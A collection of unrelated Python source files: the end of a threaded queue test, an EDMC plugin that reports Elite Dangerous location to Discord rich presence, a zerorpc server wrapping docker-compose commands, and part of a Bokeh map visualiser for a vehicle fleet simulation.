queue.enqueue(otherEvent, i)
time.sleep(0)
for i in range(0, itemCount, unit) :
with DisableQueueNotify(queue) :
for k in range(unit) :
queue.enqueue(otherEvent, i)
time.sleep(0)
queue.enqueue(stopEvent)
for thread in threadList :
thread.join()
total = sum(dataList)
assert total == itemCount * 2
|
load.py
|
# EDMC plugin for reporting a rich presence on discord which will include some basic location information
plugin_name = "DiscordPresence"
plugin_version = "4.0.0-beta1"
plugin_author = "garud, rglx"
plugin_license = "Apache, 2.0"
# removed config interfacing stuff. if you installed the plugin and then disabled it.... well, there's no reason for that
import functools, l10n # localization tools
import logging # edmc hooks into this and makes logging super easy
import time # getting current timestamp for certain things
import threading # for discord SDK wrapper
from os.path import dirname, join # used in locating our plugin directory and portably getting it for use with the SDK
import tkinter as tk # base tkinter stuff
from config import appname # just need the appname for the logger
from py_discord_sdk import discordsdk as dsdk # discord client SDK wrapper (this is the big one)
# setup EDMC logger
logger = logging.getLogger(f'{appname}.{plugin_name}')
# set up translation system (HELP WANTED PLEASE SEE THE L10n FOLDER)
_ = functools.partial(l10n.Translations.translate, context=__file__)
class DiscordPresence:
def __init__(self):
self.reportedBody = None
self.reportedActivity = None
self.reportedIsOdyssey = None
self.reportedLandingPad = None
# retrieve from an application you create at https://discord.com/developers/applications
self.discordApplicationId = 386149818227097610
# overwritten on plugin UI initialization
self.pluginLabel = None
self.pluginLabelRight = None
self.plugin_dir = None # overwritten on plugin start, points to EDMC's plugins folder
self.plugin_path = None # points to our specific plugin's folder
# massive pile of threads and interfaces that i really don't understand very well (magic, obviously)
self.activity_manager = None # handles discord sdk communication
self.activity = {} # contents of activity information
self.call_back_thread = None # handles responses from discord SDK
self.discord_thread = None # handles starting and in part, management of the SDK
self.discordSdkInterface = None # the actual discord SDK interface itself
self.currentPresenceState = _("Plugin initializing...")
self.currentPresenceDetails = _("{plugin_name} v{plugin_version}, by {plugin_author}").format(plugin_name=plugin_name,plugin_version=plugin_version,plugin_author=plugin_author)
self.currentPresenceTimestamp = int(time.time())
logger.info("instantiated an instance of "+plugin_name+"'s classcode")
# plugin initialization
def plugin_start3(self, plugin_dir):
# create the thread that'll hold our discord API instance and send it off
self.plugin_dir = plugin_dir
self.discord_thread = threading.Thread(target=self.check_run, args=(self.plugin_dir,))
self.discord_thread.setDaemon(True)
self.discord_thread.start()
return plugin_name
# plugin shutdown
def plugin_stop(self):
self.pluginLabelRight["text"] = "Shutting down Discord API..."
self.activity_manager.clear_activity(self.callback)
self.call_back_thread = None
# main window additions
def plugin_app(self, parent):
self.pluginLabel = tk.Label(parent, text="Discord:")
self.pluginLabelRight = tk.Label(parent, text="starting plugin, v"+ plugin_version, anchor=tk.W)
return self.pluginLabel, self.pluginLabelRight
# incoming journal entry from the game. fields like 'station' sometimes are not filled
def journal_entry(self, cmdr, is_beta, system, station, entry, state):
# copy our old states to compare against if they're changed instead of changing them and messing with the API if they're unchanged
newPresenceState = self.currentPresenceState
newPresenceDetails = self.currentPresenceDetails
# retrieve our global information
# get our current station on the off chance it's already set
# this might get a little strange if we're approaching a Horizons station or a dockable Odyssey station and EDMC picks up on it
if station is not None:
self.reportedBody = station
# i suspect "loadgame" event will return "Odyssey": True even in horizons so we're not going to use it here.
if entry["event"] == "Fileheader":
self.reportedIsOdyssey = False
# but we should still account for the fact that Horizons straight-up won't have an "Odyssey" entry field
if "Odyssey" in entry.keys():
self.reportedIsOdyssey = bool(entry["Odyssey"])
logger.info("Game is Odyssey? " + str(self.reportedIsOdyssey))
if entry["event"] == "Location":
if entry["Docked"]:
self.reportedBody = entry["StationName"]
else:
self.reportedBody = entry["Body"]
# if EDMC has a "system" known already this is overwritten below, and by design a 'Location' journal entry assures this.
# left just in case something goes wrong with EDMC or the game's journal events
newPresenceDetails = _("Unknown System")
# instance hopping stuff
elif entry["event"] == "StartJump":
self.reportedActivity = None
self.reportedBody = None
# starting a new jump (to SC or to witchspace)
if entry["JumpType"] == "Supercruise":
# entering supercruise
newPresenceDetails = _("Entering supercruise")
elif entry["JumpType"] == "Hyperspace":
# entering hyperspace
newPresenceDetails = _("Entering witchspace")
else:
# ... something else? dunno.
newPresenceDetails = _("Jumping ... somewhere?")
elif entry["event"] == "FSDJump":
# exiting witchspace into a new system
newPresenceDetails = _("In supercruise")
self.reportedActivity = None
self.reportedBody = None
elif entry["event"] == "SupercruiseExit":
# exiting supercruise somewhere
self.reportedBody = entry["Body"]
if self.reportedActivity == "OrbitalCruise":
newPresenceDetails = _("Flying around the surface")
else:
newPresenceDetails = _("Flying in deep space")
elif entry["event"] == "DockingGranted":
# cmdr requested docking & station authorized it
self.reportedLandingPad = str(entry["LandingPad"])
newPresenceDetails = _("Docking to {stationName}").format(stationName=entry["StationName"])
if self.reportedLandingPad != None:
newPresenceDetails += _(" (pad #{landingPadNumber})").format(landingPadNumber=self.reportedLandingPad) # PLEASE MAKE SURE, IN THE TRANSLATIONS, THAT THE LEADING SPACE IS STILL THERE.
elif entry["event"] == "DockingCancelled" or entry["event"] == "DockingDenied" or entry["event"] == "DockingRequested":
# cmdr cancelled docking authorization
# or station refused/revoked docking request (due to distance or shooting people or whatever)
# or docking requested by cmdr
# (these events all mean the same thing)
newPresenceDetails = _("Flying near {stationName}").format(stationName=entry["StationName"])
self.reportedLandingPad = None
elif entry["event"] == "Docked":
# cmdr has either logged in docked or just docked after flying to the station
# (or rebought and is now docked)
newPresenceDetails = _("Docked at {stationName}").format(stationName=entry["StationName"])
if self.reportedLandingPad != None:
newPresenceDetails += _(" (pad #{landingPadNumber})").format(landingPadNumber=self.reportedLandingPad) # PLEASE MAKE SURE, IN THE TRANSLATIONS, THAT THE LEADING SPACE IS STILL THERE.
elif entry["event"] == "Undocked":
# cmdr launching from a landing pad
newPresenceDetails = _("Launching from {stationName}").format(stationName=entry["StationName"])
if self.reportedLandingPad != None:
newPresenceDetails += _(" (pad #{landingPadNumber})").format(landingPadNumber=self.reportedLandingPad) # PLEASE MAKE SURE, IN THE TRANSLATIONS, THAT THE LEADING SPACE IS STILL THERE.
self.reportedLandingPad = None
elif entry["event"] == "SupercruiseEntry":
# entering supercruise
newPresenceDetails = _("In supercruise")
self.reportedActivity = None
self.reportedBody = None
elif entry["event"] == "ApproachBody":
# entering orbital cruise of a planet
self.reportedBody = entry["Body"]
newPresenceDetails = _("In orbital cruise")
self.reportedActivity = "OrbitalCruise"
elif entry["event"] == "ApproachSettlement":
# entering vicinity of an odyssey settlement
self.reportedBody = entry["Name"] # don't include planet body name, just station
elif entry["event"] == "Touchdown" or entry["event"] == "SRVDestroyed":
# GOOOOOOOOOOOOOOOOOOOOOOOOOOOOOAAAAAAAAAALLLLLLLLLLLLLLLLL
# landing on the surface of a planet
newPresenceDetails = _("Landed on the surface")
elif entry["event"] == "Liftoff":
# flying up into the sun like a piece of garbage
newPresenceDetails = _("Flying above the surface")
elif entry["event"] == "LaunchSRV":
newPresenceDetails = _("Driving on the surface")
# todo: find srv retrieval event name
elif entry["event"] == "Disembark":
# leaving your ship/srv/taxi on foot
newPresenceDetails = _("Walking around")
elif entry["event"] == "Embark":
# embarking into a ship SHOULD produce a location event or similar...not sure about dropships/taxis, that may need investigating
if entry["SRV"]:
newPresenceDetails = _("Driving on the surface")
# todo: find dropship-related and taxi-related events and account for them here.
# todo: wait for frontier to implement a journal event that is sent for when a fleet carrier we're docked to starts jumping somewhere else
# coding in something for the "carrierjump" event makes sense and all, but the 'system' above is updated when we get there by other events,
# but our body (and our docked state) remains the same (but not our landing pad. that is almost always different)
elif entry["event"] == "CarrierJump":
newPresenceDetails = _("Docked at {stationName}").format(stationName=entry["StationName"])
self.reportedLandingPad = None # so unset it because ships shuffle around landing pads when a carrier jumps
elif entry["event"] == "Died":
self.reportedBody = None
self.reportedLandingPad = None
self.reportedActivity = None
newPresenceDetails = _("Dead!") # :(
if system != None: # only report our system if we have it to begin with. otherwise just ignore it.
if self.reportedBody == None:
newPresenceState = _("In {system}").format(system=system)
else:
# because saying "In Parrot's Head Sector blah blah, near Parrot's Head Sector blah blah" gets really unnecessary
# might get weird if you have stations or bodies that start with the system's name that shouldn't have it removed.
if self.reportedBody.startswith(system):
self.reportedBody = self.reportedBody.replace(system,_("body"),1) # only do this once
newPresenceState = _("In {system}, near {nearby}").format(system=system,nearby=self.reportedBody)
if newPresenceState != self.currentPresenceState or newPresenceDetails != self.currentPresenceDetails:
self.currentPresenceState = newPresenceState
self.currentPresenceDetails = newPresenceDetails
self.currentPresenceTimestamp = int(time.time()) # update the time as well
# update our plugin UI as well
self.pluginLabelRight["text"] = newPresenceDetails + "\n" + newPresenceState
self.update_presence()
# update our presence in Discord itself via the SDK wrapper
def update_presence(self):
self.activity.state = self.currentPresenceDetails
self.activity.details = self.currentPresenceState
self.activity.timestamps.start = int(self.currentPresenceTimestamp)
self.activity_manager.update_activity(self.activity, self.callback)
# handles returned errors/OK-statuses from the SDK
def callback(self, result):
#logger.info(f'Callback: {result}')
if result == dsdk.Result.ok:
logger.info(f'Successfully set the activity! Code: {result}')
elif result == dsdk.Result.transaction_aborted:
logger.warning(f'Transaction aborted due to SDK shutting down: {result}')
else:
logger.error(f'Error in callback: {result}')
raise Exception(result)
# initial setup and startup
def check_run(self, plugin_dir):
# get our current directory so the SDK wrapper knows where to find the compiled libraries
self.plugin_path = join(dirname(plugin_dir), plugin_name)
# set up our SDK's instance so we can fuck around with it
retry = True
while retry:
time.sleep(1 / 10)
try:
self.discordSdkInterface = dsdk.Discord(self.discordApplicationId, dsdk.CreateFlags.no_require_discord, self.plugin_path)
retry = False
except Exception:
pass
# make it do the thing
self.activity_manager = self.discordSdkInterface.get_activity_manager()
self.activity = dsdk.Activity()
self.call_back_thread = threading.Thread(target=self.run_callbacks)
self.call_back_thread.setDaemon(True)
self.call_back_thread.start()
# update discord-visible fields with their initial values
self.currentPresenceState = _("Connecting to game...")
self.currentPresenceDetails = _("{plugin_name} v{plugin_version}, by {plugin_author}").format(plugin_name=plugin_name,plugin_version=plugin_version,plugin_author=plugin_author)
self.currentPresenceTimestamp = time.time()
self.update_presence()
# keeps the SDK API alive, and if it's dead, restarts it
def run_callbacks(self):
try:
while True:
time.sleep(1 / 10)
self.discordSdkInterface.run_callbacks()
except Exception:
self.check_run(self.plugin_dir)
plugin = DiscordPresence()
def plugin_start3(plugin_dir):
return plugin.plugin_start3(plugin_dir)
def plugin_stop():
return plugin.plugin_stop()
def plugin_app(parent):
return plugin.plugin_app(parent)
def journal_entry(cmdr, is_beta, system, station, entry, state):
return plugin.journal_entry( cmdr, is_beta, system, station, entry, state )
|
main.py
|
from ..service import BuildAction
from ..service import ConvergenceStrategy
from ..service import parse_repository_tag
from ..service import Service
from .. import config
from ..config.environment import Environment
from ..config.environment import split_env
from ..config.config import ConfigDetails
from ..config.config import ConfigFile
from ..config.serialize import denormalize_config
from ..const import HTTP_TIMEOUT
from ..cli import errors
from ..project import Project
from ..utils import json_hash
from ..cli.main import image_digests_for_project
from tempfile import TemporaryDirectory
from docker.auth import resolve_repository_name
from docker import APIClient
from docker.tls import TLSConfig
from threading import Thread
from os import environ
from os import path
import yaml
import requests
import zerorpc
import re
# https://github.com/docker/docker-py/blob/469b12a3c59ec344b7aaeebde05512387f5488b3/docker/utils/utils.py#L409
def client_kwargs(host="", ssl_version=None, assert_hostname=None, environment=None):
params = {
"version": "1.21",
"user_agent": "docker-compose-api"
}
if not environment:
environment = environ
# empty string for cert path is the same as unset.
cert_path = environment.get("DOCKER_CERT_PATH") or None
# empty string for tls verify counts as "false".
# Any value or "unset" counts as true.
tls_verify = environment.get("DOCKER_TLS_VERIFY")
if tls_verify == "":
tls_verify = False
else:
tls_verify = tls_verify is not None
enable_tls = cert_path or tls_verify
timeout = environment.get("COMPOSE_HTTP_TIMEOUT") or environment.get("DOCKER_CLIENT_TIMEOUT")
if timeout:
params["timeout"] = int(timeout)
else:
params["timeout"] = HTTP_TIMEOUT
if host:
params["base_url"] = (
host.replace("tcp://", "https://") if enable_tls else host
)
if not enable_tls:
return params
if not cert_path:
cert_path = path.join(path.expanduser("~"), ".docker")
if not tls_verify and assert_hostname is None:
# assert_hostname is a subset of TLS verification,
# so if it's not set already then set it to false.
assert_hostname = False
params["tls"] = TLSConfig(
client_cert=(path.join(cert_path, "cert.pem"),
path.join(cert_path, "key.pem")),
ca_cert=path.join(cert_path, "ca.pem"),
verify=tls_verify,
ssl_version=ssl_version,
assert_hostname=assert_hostname,
)
return params
def get_client(host="", environment=None):
return APIClient(**client_kwargs(
host=host,
ssl_version=None,
assert_hostname=None,
environment=environment
))
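# Illustrative sketch of how client_kwargs()/get_client() pick up settings from
# the standard Docker environment variables (values below are placeholders):
#
#   import os
#   os.environ["DOCKER_HOST"] = "tcp://127.0.0.1:2376"
#   os.environ["DOCKER_TLS_VERIFY"] = "1"
#   os.environ["DOCKER_CERT_PATH"] = "/home/user/.docker"
#   client = get_client(host=os.environ["DOCKER_HOST"])
#   print(client.version())
#
# With TLS enabled, the tcp:// scheme is rewritten to https:// and cert.pem,
# key.pem and ca.pem under DOCKER_CERT_PATH are used for mutual TLS.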
def get_config_details(manifest="", env_files=None, environment=None):
return ConfigDetails(
TemporaryDirectory().name,
[ConfigFile(None, yaml.safe_load(manifest))],
env_files,
environment
)
def get_config_data(manifest="", env_files=None, environment=None):
config_details = get_config_details(manifest=manifest, env_files=env_files, environment=environment)
return config.load(config_details=config_details)
def get_project(project_name=None, host=None, config_data=None, environment=None):
client = get_client(
host=host,
environment=environment
)
with errors.handle_connection_errors(client):
return Project.from_config(name=project_name, config_data=config_data, client=client)
def run_in_thread(target=None, args=()):
thread = Thread(target=target, args=args)
thread.daemon = True
thread.start()
# v1
# https://registry.hub.docker.com/v1/repositories/nodered/node-red-docker/tags/latest
# https://{registry}/v1/repositories/{repo_name}/tags/{tag || latest}
def get_image_id_v1(registry="index.docker.io", repo_name=None, tag="latest"):
if tag == "":
tag = "latest"
r_id = requests.get("https://index.{}/v1/repositories/{}/tags/{}".format(registry, repo_name, tag))
return r_id.text
# v2
# token = $(curl -s "https://auth.docker.io/token?service=registry.docker.io&scope=repository:{repo_name}:pull" | jq -r .token)
# curl -L -s -D - -H "Authorization: Bearer {toekn}" -H "Accept: " https://index.docker.io/v2/{repo_name}/manifests/{tag || latest}
# Etag: "sha256:2502e8213d0ce2616591d87bdcb8cda7677b800e08034c888c8dfd6b2e890ac7"
def get_image_id_v2(registry="index.docker.io", repo_name=None, tag="latest"):
if tag == "":
tag = "latest"
if re.search(r"\/", repo_name) == None:
repo_name = "library/{}".format(repo_name)
r_token = requests.get("http://auth.{}/token?service=registry.{}&scope=repository:{}:pull".format(registry, registry, repo_name))
r_body = r_token.json()
r_id = requests.get("https://index.{}/v2/{}/manifests/{}".format(registry, repo_name, tag), headers={
"Authorization": "Bearer {}".format(r_body.get("token")),
"Accept": "application/vnd.docker.distribution.manifest.v2+json"
})
return r_id.json().get("config").get("digest")
def get_image_id(name):
repository, tag, separator = parse_repository_tag(repo_path=name)
registry, repo_name = resolve_repository_name(repo_name=repository)
ping = requests.get("http://index.{}/v2".format(registry))
Id = None
if ping.status_code == 404:
Id = get_image_id_v1(registry=registry, repo_name=repo_name, tag=tag)
else:
Id = get_image_id_v2(registry=registry, repo_name=repo_name, tag=tag)
return Id
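# Illustrative use of get_image_id() (name and digest are placeholders):
#
#   get_image_id("redis:5")
#   # -> 'sha256:2502e8213d0ce2616591d87bdcb8cda7677b800e08034c888c8dfd6b2e890ac7'
#
# parse_repository_tag() splits the tag, resolve_repository_name() picks the
# registry, and the /v2 ping above decides between the v1 and v2 flows.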
def config_dict(service=None, image_id=""):
return {
"options": service.options,
"image_id": image_id,
"links": service.get_link_names(),
"net": service.network_mode.id,
"networks": service.networks,
"volumes_from": [
(v.source.name, v.mode)
for v in service.volumes_from if isinstance(v.source, Service)
]
}
def get_environment(options_env=""):
env = {}
if options_env is not None:
for line in options_env.splitlines():
line = line.strip()
if line and not line.startswith('#'):
k, v = split_env(line)
env[k] = v
environment = Environment(env);
environment.update(environ)
return environment
def get_host(options=None, environment=None):
return options.get("host") or environment.get("DOCKER_HOST")
class TopLevelCommand(object):
def ping(self):
return "Hello from docker-compose"
def config(self, options=None, manifest=""):
environment = get_environment(options_env=options.get("environment"))
config_data = get_config_data(manifest=manifest, env_files=options.get("files"), environment=environment)
image_digests = None
services = []
volumes = []
if options.get('resolve_image_digests'):
host = get_host(options=options, environment=environment)
image_digests = image_digests_for_project(get_project(
project_name=options.get("project_name"),
host=host,
config_data=config_data,
environment=environment
))
if options.get('quiet'):
return
if options.get('services'):
for service in config_data.services:
services.append(service['name'])
if options.get('volumes'):
for volume in config_data.volumes:
volumes.append(volume)
if options.get('services') or options.get('volumes'):
return {
"volumes": volumes,
"services": services
};
return denormalize_config(config=config_data, image_digests=image_digests)
def up(self, options=None, manifest=""):
environment = get_environment(options_env=options.get("environment"))
host = get_host(options=options, environment=environment)
config_data = get_config_data(manifest=manifest, env_files=options.get("files"), environment=environment)
project = get_project(
project_name=options.get("project_name"),
host=host,
config_data=config_data,
environment=environment
)
tree = {}
for service in project.get_services():
try:
image_id = service.image()["Id"]
except Exception:
try:
image_id = get_image_id(name=service.options["image"])
except Exception:
image_id = ""
meta = config_dict(service=service, image_id=image_id)
convergence_plan = service.convergence_plan()
plan = {
"action": convergence_plan.action,
"containers": []
}
for container in convergence_plan.containers:
plan["containers"].append({
"name": container.dictionary.get("Name"),
"id": container.dictionary.get("Id")
})
tree[service.name] = {
"plan": plan,
"hash": json_hash(obj=meta),
"meta": meta,
"dependencies": service.get_dependency_names(),
"links": service.get_linked_service_names(),
"volumes": service.get_volumes_from_names()
}
run_in_thread(target=project.up, args=(
[], # service_names
True, # start_deps
ConvergenceStrategy.changed, # strategy
BuildAction.none, # do_build
options.get("timeout"), # timeout
True, # detached
True # remove_orphans
))
return tree
def scale(self, options=None, manifest=""):
environment = get_environment(options_env=options.get("environment"))
host = get_host(options=options, environment=environment)
config_data = get_config_data(manifest=manifest, env_files=options.get("files"), environment=environment)
project = get_project(
project_name=options.get("project_name"),
host=host,
config_data=config_data,
environment=environment
)
def do(service=None, num=0):
service.scale(desired_num=num)
for service in options.get("services"):
run_in_thread(target=do, args=(
project.get_service(service.get("name")), # service_name
service.get("num"), # num
))
def main():
server = zerorpc.Server(TopLevelCommand())
server.bind("tcp://0.0.0.0:4242")
print("RPC Server listenting tcp://0.0.0.0:4242")
server.run()
|
simulator.py
|
from functools import partial
from bokeh.models import ColumnDataSource, Toggle, Slider, Div, Label
from threading import Thread
from bokeh.themes import built_in_themes
from bokeh.plotting import curdoc, figure
from bokeh.layouts import column, row
from tornado import gen
from bokeh.document import without_document_lock
from collections import defaultdict
from bokeh.tile_providers import get_provider, Vendors
from mod.env.fleet.HiredCar import HiredCar
from mod.env.fleet.Car import Car
from mod.env.fleet.CarStatus import CarStatus
import mod.env.visual as vi
import mod.env.network as nw
import numpy as np
from concurrent.futures import ThreadPoolExecutor
from pprint import pprint
from mod.env.config import FOLDER_OUTPUT
import os
class PlotTrack:
# Delay after each assignment (in seconds)
STEP_DELAY = 0
# Max alpha of value function spots
MAX_ALPHA_VALUE_FUNCTION = 0.3
CAR_FILL_ALPHA = 0.5
# Size of car glyph
CAR_SIZE = 8
PLOT_STEP = 0
OPT_STEP = 1
PLOT_EPISODE = 2
REGION_CENTER_LINE_WIDHT = 1
REGION_CENTER_LINE_ALPHA = 0.3
# Number of coordinates composing the car paths within a step
SHOW_SP_LINES = False
SHOW_LINES = True
N_POINTS = 5
FRAME_UPDATE_DELAY = 1
def update_label_text(self, main_fleet, secondary_fleet, trips):
pass
def __init__(self, config):
self.config = config
self.output_path = FOLDER_OUTPUT + config.label
self.output_folder_simulation = self.output_path + "/simulation/"
# Creating folder to save partial info
if not os.path.exists(self.output_folder_simulation):
os.makedirs(self.output_folder_simulation)
self.path_region_center_data = (
self.output_folder_simulation + "region_center_data.npy"
)
# Save previously loaded vfs
self.vf_values = dict()
# ------------------------------------------------------------ #
# Slide steps ahead ########################################## #
# ------------------------------------------------------------ #
self.steps_ahead = 0
self.slide_alpha = Slider(
title="Opacity lines",
start=0,
end=1,
value=0.2,
step=0.05,
width=150,
)
self.fleet_stats = dict()
self.decisions = dict()
self.stats = Div(text="", align="center")
self.all_points = dict(x=[], y=[])
# This is important! Save curdoc() to make sure all threads
# see the same document.
self.doc = curdoc()
self.doc.theme = "caliber"
self.doc.title = "Simulation"
# All lines (alpha control)
self.center_lines = []
# create a plot and style its properties
self.p = figure(
title="Simulation",
x_axis_type="mercator",
y_axis_type="mercator",
plot_height=800,
plot_width=1000,
border_fill_color="white",
background_fill_color="white",
)
self.p.title.text_font_size = "25px"
self.p.title.align = "center"
self.p.add_tile(get_provider(Vendors.CARTODBPOSITRON_RETINA))
self.plot_step = 0
self.plot_episode = 0
self.opt_step = 0
self.opt_episode = 0
self.env = None
self.trips_dict = dict()
self.step_car_path_dict = defaultdict(lambda: defaultdict(dict))
source_point_value = ColumnDataSource(
data=dict(x=[], y=[], fill_alpha=[])
)
# -------------------------------------------------------------------- #
# Value function point style ######################################### #
# -------------------------------------------------------------------- #
self.value_function = self.p.circle(
x="x",
y="y",
size=30,
color="purple",
fill_alpha="fill_alpha",
line_width=0,
muted_alpha=0.0,
legend="Value function",
source=source_point_value,
)
self.source = {
CarStatus.REBALANCE: self.p.triangle(
x=[],
y=[],
size=PlotTrack.CAR_SIZE,
color=self.config.color_fleet_status[CarStatus.REBALANCE],
fill_alpha=PlotTrack.CAR_FILL_ALPHA,
line_width=0,
muted_alpha=0.0,
legend=Car.status_label_dict[CarStatus.REBALANCE],
),
CarStatus.RETURN: self.p.triangle(
x=[],
y=[],
size=PlotTrack.CAR_SIZE,
color=self.config.color_fleet_status[CarStatus.RETURN],
fill_alpha=PlotTrack.CAR_FILL_ALPHA,
line_width=0,
muted_alpha=0.0,
legend=Car.status_label_dict[CarStatus.RETURN],
),
CarStatus.ASSIGN: self.p.triangle(
x=[],
y=[],
size=PlotTrack.CAR_SIZE,
color=self.config.color_fleet_status[CarStatus.ASSIGN],
fill_alpha=PlotTrack.CAR_FILL_ALPHA,
line_width=0,
muted_alpha=0.0,
legend=Car.status_label_dict[CarStatus.ASSIGN],
),
CarStatus.CRUISING: self.p.triangle(
x=[],
y=[],
size=PlotTrack.CAR_SIZE,
# color=self.config.color_fleet_status[CarStatus.CRUISING],
line_color=self.config.color_fleet_status[CarStatus.ASSIGN],
fill_alpha=0.0,
line_width=0.5,
muted_alpha=0.0,
legend=Car.status_label_dict[CarStatus.CRUISING],
),
CarStatus.IDLE: self.p.triangle(
x=[],
y=[],
size=PlotTrack.CAR_SIZE,
# color="navy",
fill_alpha=0.0,
line_width=0.5,
line_color=self.config.color_fleet_status[CarStatus.IDLE],
muted_alpha=0.0,
legend=Car.status_label_dict[CarStatus.IDLE],
),
CarStatus.RECHARGING: self.p.triangle(
x=[],
y=[],
size=PlotTrack.CAR_SIZE,
color=self.config.color_fleet_status[CarStatus.RECHARGING],
line_width=0,
fill_alpha=PlotTrack.CAR_FILL_ALPHA,
muted_alpha=0.0,
legend=Car.status_label_dict[CarStatus.RECHARGING],
),
"o": self.p.circle(
x=[],
y=[],
size=15,
color="green",
fill_alpha=0.3,
line_width=0,
muted_alpha=0.0,
legend="Origins",
),
"d": self.p.circle(
x=[],
y=[],
size=15,
color="firebrick",
fill_alpha=0.3,
line_width=0,
muted_alpha=0.0,
legend="Destinations",
),
}
self.slide_alpha.on_change("value", self.update_line_alpha_centers)
self.slide_time_ahead = Slider(
title="Time step", start=1, end=15, value=1, step=1, width=150
)
self.slide_time_ahead.on_change("value", self.update_time_ahead)
self.slide_battery_level = Slider(
title="Battery level", start=0, end=1, value=0, step=1, width=150
)
self.slide_battery_level.on_change("value", self.update_time_ahead)
self.slide_agg_level = Slider(
title="Aggregation level",
start=0,
end=10,
value=0,
step=1,
width=150,
)
self.slide_agg_level.on_change("value", self.update_time_ahead)
def set_env(self, env):
self.env = env
self.slide_agg_level.end = env.config.n_aggregation_levels
self.slide_time_ahead.end = env.config.time_steps
self.slide_battery_level.end = env.config.battery_levels
@gen.coroutine
@without_document_lock
def update_line_alpha_centers(self, attrname, old, new):
# global run_plot
for c_lines in self.center_lines:
c_lines.glyph.line_alpha = self.slide_alpha.value
def config_figure(self):
self.p.legend.click_policy = "mute"
self.p.legend.location = "bottom_right"
# p.outline_line_color = None
@gen.coroutine
def update_plot_frame(self):
if self.plot_step in self.trips_dict:
# Plot all trips
for od, trips in self.trips_dict[self.plot_step].items():
self.source[od].data_source.data = trips
# print("###############", self.plot_step, "<", self.opt_step)
# pprint(self.step_car_path_dict)
if (
self.plot_step < self.opt_step
and self.plot_step in self.step_car_path_dict
):
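# get_next_frame() returns the current xy coordinates per CarStatus and
# the index of the next step to plot (advanced only once every car has
# consumed its path for the current step).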
status_movements, next_step = vi.get_next_frame(
self.step_car_path_dict, self.plot_step
)
# Update the car paths in all car statuses (i.e., rebalancing,
# parked, picking up user and recharging)
for status in CarStatus:
car_paths_xy = status_movements.get(status, dict(x=[], y=[]))
self.source[status].data_source.data = car_paths_xy
if next_step > self.plot_step:
# Trips are created in step n, and vehicles are scheduled in
# step n + 1
# try:
# del trips_dict[current_plot_step-1]
# except:
# pass
# Update plot title
self.plot_step = next_step
# Updating title
current_time = self.config.get_time(
self.plot_step, format="%I:%M %p"
)
self.p.title.text = (
# f"Iteration: {self.plot_episode:>5} - "
f"Time: {current_time} - "
f"Step: {self.plot_step:>5}/{self.config.time_steps:>5}"
)
# Stats
self.stats.text = self.get_fleet_stats(self.plot_step)
# Update attribute value functions
# self.update_value_function(
# self.plot_step,
# self.slide_battery_level.value,
# self.slide_agg_level.value
# )
@gen.coroutine
def update_attribute(self, attribute, value, param):
if param:
attribute.data_source.data[param] = value
else:
attribute.data_source.data = value
def update_screen(self, attribute=None, value=None, param=None):
# Updating alpha values
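# Bokeh documents may only be modified from the document's own event loop,
# so updates coming from worker threads are scheduled with
# add_next_tick_callback instead of touching the data sources directly.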
self.doc.add_next_tick_callback(
partial(
self.update_attribute,
attribute=attribute,
value=value,
param=param,
)
)
@gen.coroutine
@without_document_lock
def update_value_function(self, steps_ahead, battery_level, agg_level):
"""Update the alpha of all value function spots considering a number
of steps ahead the current time step.
Parameters
----------
steps_ahead : int
Number of steps ahead value functions should be shown.
battery_level : int
Show value functions corresponding to a battery level.
agg_level : int
Aggregation level the values correspond to.
Value function data and the environment are read from self.value_function
and self.env rather than passed as parameters.
"""
# Number of steps ahead value functions are visualized
future_step = steps_ahead
print("Calculating value functions...")
if future_step in self.vf_values:
values = self.vf_values[future_step]
else:
# Value function of all points
values = np.zeros(len(self.env.points))
# Get all valid value function throughout the map at a certain level
for point in self.env.points_level[self.env.config.centroid_level]:
# Value function corresponds to position and battery level,
# i.e., how valuable is to have a vehicle at position p with
# a certain battery level
attribute = (
future_step,
point.id,
Car.DISCARD_BATTERY,
Car.INFINITE_CONTRACT_DURATION,
Car.TYPE_FLEET,
Car.COMPANY_OWNED_ORIGIN,
)
# TIME = 0
# LOCATION = 1
# BATTERY = 2
# CONTRACT = 3
# CARTYPE = 4
# ORIGIN = 5
# Checking whether value function was defined
# if (
# future_step in self.env.values
# and agg_level in self.env.values[future_step]
# and attribute in self.env.values[future_step][agg_level]
# ):
# id_g = point.id_level(agg_level)
estimate = self.env.adp.get_weighted_value(attribute)
values[point.id] = estimate
# self.env.values[future_step][agg_level][attribute]
# Total value function throughout all points
total = np.sum(values)
if total > 0:
# Values are between 0 and 1
values = values / np.sum(values)
# Values are normalized
values = (values - np.min(values)) / (
np.max(values) - np.min(values)
)
# Resize alpha factor
values = PlotTrack.MAX_ALPHA_VALUE_FUNCTION * values
print("Finished calculating...")
self.vf_values[future_step] = values
self.update_screen(
attribute=self.value_function, value=values, param="fill_alpha"
)
def create_value_function_points(self, points):
self.value_function.data_source.data = {
**{"fill_alpha": np.zeros(len(points["x"]))},
**points,
}
def create_regular_points(self, points):
point_regular = self.p.circle(
x=[],
y=[],
size=2,
color="firebrick",
fill_alpha=0.5,
line_width=0,
legend="Intersection",
muted_alpha=0,
)
point_regular.data_source.data = points
self.all_points = points
def get_region_center_toggle(
self, lines_xy, i_level, level, level_demand, level_fleet, centers
):
active = False
region_fleet = ""
region_demand = ""
if level == level_demand:
region_demand = " [D] "
active = True
if level == level_fleet:
region_fleet = "[F] "
active = True
lines_level_glyph = self.p.multi_line(
[],
[],
line_color="firebrick",
line_alpha=PlotTrack.REGION_CENTER_LINE_ALPHA,
line_width=PlotTrack.REGION_CENTER_LINE_WIDHT,
muted_alpha=0.00,
visible=active,
)
self.center_lines.append(lines_level_glyph)
point_centers = self.p.circle(
x=[],
y=[],
size=6,
color="white",
line_width=1,
line_color="firebrick",
visible=active,
)
point_centers.data_source.data = centers
lines_level_glyph.data_source.data = lines_xy[level]
toggle = Toggle(
label=(
f"Level {i_level:>2} ({level:>3}s)"
f"{region_demand + region_fleet:>7}"
),
active=active,
width=150,
)
toggle.js_link("active", lines_level_glyph, "visible")
toggle.js_link("active", point_centers, "visible")
return toggle
@staticmethod
def default_to_regular(d):
if isinstance(d, defaultdict):
d = {k: PlotTrack.default_to_regular(v) for k, v in d.items()}
return d
def get_fleet_stats(self, step):
# text = "<h4>### FLEET STATS </h4>"
text = "<table>"
for fleet_type, status_count in self.fleet_stats[step].items():
text += f"<tr><td style='font-size:16px;text-align:right'><b>{fleet_type}</b></td>"
for status, count in status_count.items():
text += (
f"<td style='text-align:right'>"
f"<b>{status}:</b>"
"</td><td style='width:15px'>"
f"{count}"
"<td>"
)
text += "</tr>"
text += "</table>"
# text = "<h4>### FLEET STATS </h4>"
text += "<table><tr>"
